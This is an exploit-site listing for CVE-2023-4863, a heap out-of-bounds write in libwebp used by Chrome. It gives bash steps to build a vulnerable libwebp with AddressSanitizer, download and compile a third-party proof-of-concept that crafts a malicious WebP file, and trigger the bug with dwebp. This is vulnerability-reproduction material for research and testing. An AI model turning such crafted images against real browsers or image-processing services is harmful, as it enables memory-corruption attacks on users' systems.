Exploit for Out-of-bounds Write in Google Chrome CVE-2023-4863

Name: Exploit for Out-of-bounds Write in Google Chrome CVE-2023-4863
Rating: 5 (347 reviews)

2023-09-25 | CVSS 6.8

## https://sploitus.com/exploit?id=D4102657-EE2B-57F3-9955-0070EBA6015F
# CVE-2023-4863
```bash
  # checkout webp
git clone https://chromium.googlesource.com/webm/libwebp/ webp_test
cd webp_test/
  # checkout vulnerable version
git checkout 7ba44f80f3b94fc0138db159afea770ef06532a0
  # enable AddressSanitizer
sed -i 's/^EXTRA_FLAGS=.*/& -fsanitize=address/' makefile.unix
  # build webp
make -f makefile.unix
cd examples/
  # fetch mistymntncop's proof-of-concept code
wget https://raw.githubusercontent.com/mistymntncop/CVE-2023-4863/main/craft.c
  # build and run proof-of-concept
gcc -o craft craft.c
./craft bad.webp
  # test trigger file
./dwebp bad.webp -o test.png
```